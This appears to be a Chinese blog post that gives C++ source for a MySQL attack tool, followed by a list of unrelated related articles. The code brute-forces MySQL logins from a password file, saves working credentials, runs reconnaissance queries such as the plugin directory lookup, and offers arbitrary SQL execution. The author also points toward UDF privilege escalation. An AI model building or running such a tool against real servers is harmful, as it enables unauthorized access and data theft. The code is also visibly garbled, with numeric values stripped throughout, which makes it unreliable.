#include "StdAfx.h"

#include "Sql.h"

#include <windows.h>

#include <stdio.h>

#include <mysql.h>

#pragma comment(linker,"/nodefaultlib:LIBCMT.lib")

#pragma comment(linker,"/nodefaultlib:MSVCRTD.lib")

#if defined _DEBUG

#pragma comment(lib, "mysqlclient_debug.lib")

#else

#pragma comment(lib, "mysqlclient.lib")

#endif

#pragma comment(lib, "wsock32.lib")

#pragma comment(lib, "Advapi32.lib") 

Sql::Sql(void)

{

}

Sql::~Sql(void)

{

}

void Sql::writefiles(char* buffer)

{

    FILE* fp = NULL;

    fp = fopen("succ.txt","a+");

    if (fp != NULL)

    {

        fwrite(buffer,strlen(buffer),,fp);

    }

    fclose(fp);

}

void Sql::Usage(char* help)

{

    printf("[-]:%s Usage:->192.168.1.1->root->crack\r\n",help);

    printf("[-]:%s Usage:->192.168.1.1->root->sql->passwordroot->select user()\r\n",help);

    //return;

    exit();

}

int Sql::crack_mysql(char* ServerHost,char* Username,char* password)

{

    MYSQL *conn;

    MYSQL_RES *res;

    MYSQL_ROW row;

    char plugs[];

    conn = mysql_init(NULL);

    char buffer[] = {};

    int count = ;

    char* Sql_exec[] = {"select version()","select user()","show databases","select @@plugin_dir"};

    if (!mysql_real_connect(conn,ServerHost,

        Username,password,"mysql",,NULL,CLIENT_MULTI_STATEMENTS))

    {

        printf("Host:%s->Username:%s->Password:%s failed\r\n",ServerHost,Username,password);

        mysql_close(conn);

    }else

    {

        memset(buffer,,sizeof(buffer));

        sprintf_s(buffer,"Host:%s->Username:%s->Password:%s successfuly\r\n\r\n",ServerHost,Username,password);

        printf(buffer);

        writefiles(buffer);

        if (mysql_select_db(conn,"mysql"))

        {

            printf("Select Errors the mysql database!\r\n");

        }

        for (int i =;i<;i++)

        {

            if (mysql_query(conn,Sql_exec[i]))

            {

                fprintf(stderr,"%s\r\n",mysql_error(conn));

                //exit(1);

            }

            res = mysql_use_result(conn);

            //res = mysql_store_result(conn);

            while ((row = mysql_fetch_row(res)) != NULL)

            {

                sprintf_s(plugs,"%s",row[]);

                printf("%s\r\n",plugs);

            }

        }

        mysql_free_result(res);

        mysql_close(conn);

    }

    return ;

}

int Sql::sql_exec(char* ServerHost,char* Username,char* password,char* sql)

{

    MYSQL *conn;

    MYSQL_RES *res;

    MYSQL_ROW row;

    char plugs[];

    conn = mysql_init(NULL);

    int count = ;

    if (mysql_real_connect(conn,ServerHost,

        Username,password,"mysql",,NULL,CLIENT_MULTI_STATEMENTS))

    {

        fprintf(stderr,"Host:%s->Username:%s->Password:%s successfuly\r\n\r\n",ServerHost,Username,password);

        if (mysql_select_db(conn,"mysql"))

        {

            printf("Select Errors the mysql database!\r\n");

        }

        if (mysql_query(conn,sql))

        {

            fprintf(stderr,"%s\r\n",mysql_error(conn));

            //exit(1);

        }

        if (!(res = mysql_store_result(conn)))

        {

            return -;

        }

        while ((row = mysql_fetch_row(res)) != NULL)

        {

            ZeroMemory(plugs,sizeof(plugs));

            sprintf_s(plugs,"%s",row[]);

            printf("%s\r\n",plugs);

        }

        mysql_free_result(res);

        mysql_close(conn);

    }else

    {

        fprintf(stderr,"Host:%s->Username:%s->Password:%s failed\r\n",ServerHost,Username,password);

    }

    return ;

}

int main(int argc,char* argv[])

{

    char* ServerHost = argv[];

    char* Username = argv[];

    char* method = argv[];

    Sql* newsql = NULL;

    FILE* fp = NULL;

    char buffer[MAX_PATH] = {};

    if (argc < )

    {

        newsql->Usage(argv[]);

    }

    if (strstr(method,"crack"))

    {

        fp = fopen("pass.txt","rb");

        if (fp == NULL)

        {

            printf("Error:%d, pwd.txt not found\r\n",GetLastError());

            return ;

        }

        while (fgets(buffer,MAX_PATH,fp) != NULL)

        {

            if (buffer[strlen(buffer) - ] == '\r')

            {

                buffer[strlen(buffer) - ] = '\0';

            }

            if (buffer[strlen(buffer) - ] == '\n')

            {

                buffer[strlen(buffer) - ] = '\0';

            }

            newsql->crack_mysql(ServerHost,Username,buffer);

            memset(buffer,,sizeof(buffer));

        }

        fclose(fp);

    }else if (strstr(method,"sql"))

    {

        char* password = argv[];

        char* sql = argv[];

        newsql->sql_exec(ServerHost,Username,password,sql);

    }

    return ;

}

头文件

#pragma once

class Sql

{

public:

    Sql(void);

    ~Sql(void);

    void Usage(char*);

    int crack_mysql(char* ServerHost,char* Username,char* password);

    int sql_exec(char* ServerHost,char* Username,char* password,char* sql);

    void writefiles(char* buffer);

};

本来还想写一个UDF 导出提权的,懒得写了。有兴趣的人可以自己去写。

Mysql 利用小工具源码的更多相关文章

  1. Qt5.5.0使用mysql编写小软件源码讲解---顾客信息登记表

    Qt5.5.0使用mysql编写小软件源码讲解---顾客信息登记表 一个个人觉得比较简单小巧的软件. 下面就如何编写如何发布打包来介绍一下吧! 先下载mysql的库文件链接:http://files. ...

  2. 实例源码--Android小工具源码

      下载源码   技术要点: 1. Android控件布局的使用 2. Http通信 3. XML数据解析 4. 网络状态的监听 5. 源码带有非常详细的中文注释 ...... 详细介绍: 1. An ...

  3. 从微信小程序开发者工具源码看实现原理(四)- - 自适应布局

    从前面从微信小程序开发者工具源码看实现原理(一)- - 小程序架构设计可以知道,小程序大部分是通过web技术进行渲染的,也就是最终通过浏览器的dom tree + cssom来生成渲染树:既然最终是通 ...

  4. 从微信小程序开发者工具源码看实现原理(一)- - 小程序架构设计

    使用微信小程序开发已经很长时间了,对小程序开发已经相当熟练了:但是作为一名对技术有追求的前端开发,仅仅熟练掌握小程序的开发感觉还是不够的,我们应该更进一步的去理解其背后实现的原理以及对应的考量,这可能 ...

  5. 复用微信小程序源码包后仍然有原小程序的版本管理怎么处理

    前言: 复用微信小程序源码包后,重新创建项目导入源码包,会发现开发者工具版本管理中仍然有原来小程序的版本,这样就不太好了.毕竟是一个新的小程序,需要有新的版本控制的.那么这个问题怎么处理呢? 解决方案 ...

  6. MySQL的JDBC驱动源码解析

    原文:   MySQL的JDBC驱动源码解析 大家都知道JDBC是Java访问数据库的一套规范,具体访问数据库的细节有各个数据库厂商自己实现 Java数据库连接(JDBC)由一组用 Java 编程语言 ...

  7. MySQL Master High Available 源码篇

    https://m.aliyun.com/yunqi/users/1287368569594542/articles https://yq.aliyun.com/articles/59233 MySQ ...

  8. 反编译获取线上任何微信小程序源码(转)

    看到人家上线的小程序的效果,纯靠推测,部分效果在绞尽脑汁后能做出大致的实现,但是有些细节,费劲全力都没能做出来.很想一窥源码?查看究竟?看看大厂的前端大神们是如何规避了小程序的各种奇葩的坑?那么赶紧来 ...

  9. 【转】反编译获取任何微信小程序源码(完)

    一.前言最近在学习微信小程序开发,半个月学习下来,很想实战一下踩踩坑,于是就仿写了一个阿里妈妈淘宝客小程序的前端实现,过程一言难尽,差不多两周时间过去了,发现小程序的坑远比想象的要多的多!!在实际练手 ...

随机推荐

  1. 前端Js传递数组至服务器端

    $("#delete").click(function () { var ID = ""; var ary = []; var bb = document.ge ...

  2. Java的默认构造函数调用

    // 注意,这里不能是 public class OOO,否则编译无法通过,需把文件命名成 OOO.java class OOO { // 注意:如果不定义OOO(),那么Shapes(int i)编 ...

  3. ES6学习笔记(一)——let和const

    1.ES6学习之let.const (1).var.let.const 变(常)量声明 ES5 只有全局作用域和函数作用域,没有块级作用域,这带来很多不合理的场景. 在ES6中let就诞生了,实际上它 ...

  4. InnoDB 与 MyISAM 区别

      1.myisam可以对索引进行压缩,innodb不压缩 2.索引都用b-tree, innodb使用 b+tree,NDB Cluster使用 T-Tree. 3.myisam 表级锁, inno ...

  5. 修改mysql root的密码

    use mysql:update user set Password = Password('newPwd') where user='root';//更改root用户的密码flush privile ...

  6. Python基础-文件的基本操作

    测试文件fansik内容如下:This is line 1This is line 2This is line 3This is line 4This is line 5This is line 6 ...

  7. 面向对象高级编程——使用__slots__

    正常情况下,我们定义了一个class,创建了一个class的实例后,我们可以给该实例绑定任何属性和方法,这就是动态语言的灵活性.先定义class: >>> class Student ...

  8. 异动K线--庄家破绽

    <异动K线--庄家破绽(连载)> http://bbs.tianya.cn/post-stocks-612892-1.shtml ————马后炮分析,没有什么前瞻性.纯技术是害死许多钻牛角 ...

  9. selenium网页没加载完成就停止加载并自动刷新

    判断一个网页10秒没加载完成就停止加载并自动刷新 driver=webdriver.Chome() driver.set_page_load_timeout(10) while True: try: ...

  10. javaweb学习纲要

    Java Web  概述 大纲: 1.C/S体系结构 2.B/S体系机构 3.两种体系结构比较 4.主流的Web程序应用平台 5.java web学习路线图 1.C/S体系结构 C/S是Client/ ...